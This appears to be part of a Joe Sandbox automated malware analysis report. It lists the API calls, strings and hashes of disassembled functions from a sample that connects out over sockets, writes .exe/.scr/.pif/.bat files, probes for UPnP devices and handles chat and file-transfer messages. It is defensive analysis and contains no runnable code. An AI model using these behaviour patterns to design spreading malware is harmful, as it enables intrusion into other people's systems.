                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcmp
                                                                                                                                                                                                                                                      • String ID: CANCELLED$COMPLETED$FAILED$FAILUREREASON$FILEPATH$PARTNER_HANDLE$REMOTELY_CANCELLED$REMOTE_DOES_NOT_SUPPORT_FT$STATUS$TRANSFERRING$TRANSFERRING_OVER_RELAY$TYPE$WAITING_FOR_ACCEPT
                                                                                                                                                                                                                                                      • API String ID: 1534048567-744108491
                                                                                                                                                                                                                                                      • Opcode ID: ec0cd1e2b90010dfda27b275c556f8175fe93904ff42968a33ce4f6e27d3a9cc
                                                                                                                                                                                                                                                      • Instruction ID: 72b9af55eec2882945b3e114dfeaaf4924080daac8686bd805d82c4e419bdb68
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec0cd1e2b90010dfda27b275c556f8175fe93904ff42968a33ce4f6e27d3a9cc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B64108B1B0C756B9E71166316D05F976F8C9F11788F14011BFC16A2283FB9CEA8642BE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040EDCD
                                                                                                                                                                                                                                                        • Part of subcall function 004138BC: inet_addr.WS2_32(?), ref: 004138C0
                                                                                                                                                                                                                                                        • Part of subcall function 004138BC: gethostbyname.WS2_32(?), ref: 004138CF
                                                                                                                                                                                                                                                      • htons.WS2_32(00000050), ref: 0040EDEF
                                                                                                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 0040EE02
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0040EE3F
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 0040EE50
                                                                                                                                                                                                                                                      • send.WS2_32(?,?,00000000), ref: 0040EE61
                                                                                                                                                                                                                                                      • select.WS2_32(?,00000001,00000000,00000000,0000012C), ref: 0040EEAC
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(?,00000001), ref: 0040EEBA
                                                                                                                                                                                                                                                      • recv.WS2_32(?,?,00000001,00000000), ref: 0040EED7
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000,0000012C), ref: 0040EFB3
                                                                                                                                                                                                                                                      • select.WS2_32(?,?,00000000,00000000,0000012C), ref: 0040F00C
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(?,?), ref: 0040F01A
                                                                                                                                                                                                                                                      • recv.WS2_32(?,?,0000012C,00000000), ref: 0040F03D
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000050,?,00000000,?,00000000,?,?,?,?,00000000,00000000,0000012C), ref: 0040F05F
                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,?,?,?,?,00000000,00000000,0000012C), ref: 0040F096
                                                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 0040F09F
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000050), ref: 0040F0B7
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000050,?,?,?,?,00000000,00000000,0000012C), ref: 0040F0CF
                                                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 0040F0D6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseHandleclosesocketrecvselect$CreateDeleteWriteconnectgethostbynamehtonsinet_addrlstrlensendsocketwsprintf
                                                                                                                                                                                                                                                      • String ID: P$content-length
                                                                                                                                                                                                                                                      • API String ID: 3774398911-3848048151
                                                                                                                                                                                                                                                      • Opcode ID: ba15c6579de2a9f8b190b4e6ed1e9fdf60cd2fcf7e62dba43eb5082df7cbf481
                                                                                                                                                                                                                                                      • Instruction ID: df7c141f36d014bdbe9f01baf4845fad3867586616f8a03ca99066f9affce91e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba15c6579de2a9f8b190b4e6ed1e9fdf60cd2fcf7e62dba43eb5082df7cbf481
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FB17F7290021AAFDF219FA1DC49AEE77BCEB04340F5044B7FA04E2191DB749A958FA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000000), ref: 0041693B
                                                                                                                                                                                                                                                      • WSACreateEvent.WS2_32 ref: 0041697A
                                                                                                                                                                                                                                                      • WSAEventSelect.WS2_32(?,00000000,00000001), ref: 00416989
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004169BA
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004169CB
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 004169E9
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004169FA
                                                                                                                                                                                                                                                      • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,000003E8,00000000), ref: 00416A0F
                                                                                                                                                                                                                                                      • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00416A39
                                                                                                                                                                                                                                                      • recv.WS2_32(?,?,000027D8,00000000), ref: 00416A5A
                                                                                                                                                                                                                                                      • WSAEventSelect.WS2_32(?,?,00000000), ref: 00416A7D
                                                                                                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 00416A86
                                                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 00416A8F
                                                                                                                                                                                                                                                        • Part of subcall function 00416896: GetAdaptersInfo.IPHLPAPI(00000000,76AF23A0), ref: 004168B8
                                                                                                                                                                                                                                                        • Part of subcall function 00416896: GetAdaptersInfo.IPHLPAPI(00000000,76AF23A0), ref: 004168DA
                                                                                                                                                                                                                                                        • Part of subcall function 00416896: inet_addr.WS2_32(000001D8), ref: 004168ED
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00416AD6
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,LOCATION:,?,?,?,00000009), ref: 00416B5E
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00416B8A
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00416B95
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 00416BBF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Event$wsprintf$AdaptersEventsInfoSelectlstrlen$CloseCountCreateEnumMultipleNetworkSleepTickWaitclosesocketinet_addrlstrcmplstrcpyrecvsocket
                                                                                                                                                                                                                                                      • String ID: %s%s:%s:%d$LOCATION:$M-SEARCH * HTTP/1.1HOST: 239.255.255.250:1900MAN: "ssdp:discover"MX: %dST: %s
                                                                                                                                                                                                                                                      • API String ID: 2562599888-3500286704
                                                                                                                                                                                                                                                      • Opcode ID: b77233556a7725e177ed8c5a668ddfbb9ea8689ee60f8ad2de43d20d68d6390f
                                                                                                                                                                                                                                                      • Instruction ID: 9e51965793058bf11e0cbbee6e673dd6e2c4d97b6ca73878eae949ba9782d4d4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b77233556a7725e177ed8c5a668ddfbb9ea8689ee60f8ad2de43d20d68d6390f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC8180B2900218ABDF21DB90DC49EDE7B7DBF45304F4440ABFA08E2151DB789A95CF5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,?), ref: 00410CB8
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A3B0), ref: 00410CC6
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00410CDD
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000001), ref: 00410D14
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00410D26
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00410D33
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00410D56
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00410DB1
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00410DC8
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,.rar), ref: 00410E7E
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080), ref: 00410ED0
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00410EEB
                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00410EFF
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,0044F764,00000000,00000000), ref: 00410F1C
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00410F2C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$File$lstrcatlstrcpy$AttributesCloseCountCreateHandlePointerTickWrite
                                                                                                                                                                                                                                                      • String ID: .bat$.exe$.pif$.rar$.scr
                                                                                                                                                                                                                                                      • API String ID: 2853162838-1980087502
                                                                                                                                                                                                                                                      • Opcode ID: cd2cb76b9ea399bf1adc54bc28882df8a0823b127e6be962eeb4c1f6e0ca547a
                                                                                                                                                                                                                                                      • Instruction ID: a707fd0e934dd8137797f0eae7484e27a9d6554787a2e330bca94269bf19ba9d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd2cb76b9ea399bf1adc54bc28882df8a0823b127e6be962eeb4c1f6e0ca547a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41811971A40308ABDB20DBA4EC88BEA7BB8AB15310F54446BE904D7291D7FC99C5CF5D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041E95A
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041E969
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041E977
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041E985
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041E993
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041E9A1
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041E9AF
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041E9BD
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041E9CB
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041E9D9
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041E9E7
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041E9F5
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041EA03
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041EA11
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041EA1F
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041EA29
                                                                                                                                                                                                                                                        • Part of subcall function 0041E94D: Sleep.KERNEL32(0000000A), ref: 0041EA37
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0041EBF6
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041EC01
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0041EC1E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 0041EC2D
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 0041EC30
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(SEARCH CHATS), ref: 0041EC43
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041EC4B
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032), ref: 0041EC75
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0041EC91
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,0045B104), ref: 0041ECAE
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0001EA3D,?,00000000,00000000), ref: 0041ECC2
                                                                                                                                                                                                                                                      • Sleep.KERNEL32 ref: 0041ECCE
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000002), ref: 0041ECFE
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041ED0C
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041ED54
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041ED74
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041ED90
                                                                                                                                                                                                                                                        • Part of subcall function 0041E4EA: wsprintfA.USER32 ref: 0041E511
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041EDAA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$CountTick$CreateThreadlstrcmpwsprintf
                                                                                                                                                                                                                                                      • String ID: PING$SEARCH CHATS
                                                                                                                                                                                                                                                      • API String ID: 3488842300-178521329
                                                                                                                                                                                                                                                      • Opcode ID: ef5673201f1404c1ca3bd53deda4e981a1f0ae3839f705b7223461506a8e86ee
                                                                                                                                                                                                                                                      • Instruction ID: 916bf970ecb5145056bdac1988b09c6a9c2e19ca1b4da1a1a251816765a4c4ae
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef5673201f1404c1ca3bd53deda4e981a1f0ae3839f705b7223461506a8e86ee
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB512874904386AAE720AB67EC416EE7B56BF81304F14002FE84443282E7BDECC197DE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,0042A4DC,76AF0440,75D36610,?,004166C4,?,00000000,?,?,?,00416BE9,?,?), ref: 0041643E
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,004166C4,?,00000000,?,?,?,00416BE9,?,?), ref: 00416447
                                                                                                                                                                                                                                                      • inet_addr.WS2_32(?), ref: 00416453
                                                                                                                                                                                                                                                      • htons.WS2_32(?), ref: 00416475
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 00416489
                                                                                                                                                                                                                                                      • connect.WS2_32(00000000,?,00000010), ref: 004164A7
                                                                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 004164BA
                                                                                                                                                                                                                                                      • send.WS2_32(00000000,?,?,00000000), ref: 004164CC
                                                                                                                                                                                                                                                      • WSACreateEvent.WS2_32 ref: 004164DE
                                                                                                                                                                                                                                                      • WSAEventSelect.WS2_32(00000000,00000000,00000001), ref: 004164EA
                                                                                                                                                                                                                                                      • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,000001F4,00000000,?,00416BE9,?,?), ref: 004164FF
                                                                                                                                                                                                                                                      • WSAEnumNetworkEvents.WS2_32(00000000,?,?), ref: 00416518
                                                                                                                                                                                                                                                      • recv.WS2_32(00000000,?,?,00000000), ref: 00416537
                                                                                                                                                                                                                                                      • WSAEventSelect.WS2_32(00000000,?,00000000), ref: 00416575
                                                                                                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 0041657E
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00416585
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00416593
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Event$EventsSelectclosesocket$CloseCreateEnumMultipleNetworkWaitconnecthtonsinet_addrioctlsocketlstrcpylstrlenrecvsendsocket
                                                                                                                                                                                                                                                      • String ID: errorCode
                                                                                                                                                                                                                                                      • API String ID: 2583547606-3920415024
                                                                                                                                                                                                                                                      • Opcode ID: 5bede5d7b3fcbb416961ea5a444a45f1b407bf5c87ba4673ed87c0861eedf1bb
                                                                                                                                                                                                                                                      • Instruction ID: 42a50d69ac69a0ee54dd750834b03585f21b0629c20ee4c731e65a41b7016928
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bede5d7b3fcbb416961ea5a444a45f1b407bf5c87ba4673ed87c0861eedf1bb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33518DB2501219AFDF20DFA4EC489EE3BADEF04315F41012AFE15D2161DB38D996CB69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00411B05
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.rar), ref: 00411B35
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00411B89
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.bat), ref: 00411BD0
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00411C2E
                                                                                                                                                                                                                                                      • GetDateFormatA.KERNEL32(00000409,00000000,00000000,ddd, dd MMM yyyy,?,00000046), ref: 00411C47
                                                                                                                                                                                                                                                      • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,0000001E), ref: 00411C5D
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00411CA7
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00411CB3
                                                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 00411CE6
                                                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 00411CF5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Formatlstrcatlstrlenwsprintf$CountDateExitThreadTickTimeclosesocket
                                                                                                                                                                                                                                                      • String ID: .bat$.exe$.pif$.rar$.scr$HH:mm:ss$application/octet-stream$ddd, dd MMM yyyy
                                                                                                                                                                                                                                                      • API String ID: 3598078581-1427699089
                                                                                                                                                                                                                                                      • Opcode ID: fd1c5a4e983aee0bd192005bd383998f2e9dc81b205b0303a8ff2a485af2f471
                                                                                                                                                                                                                                                      • Instruction ID: 9eca82a3637e8faf574de7896f30193d89e1a9b0e212edd64fec5bc27ffb3845
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd1c5a4e983aee0bd192005bd383998f2e9dc81b205b0303a8ff2a485af2f471
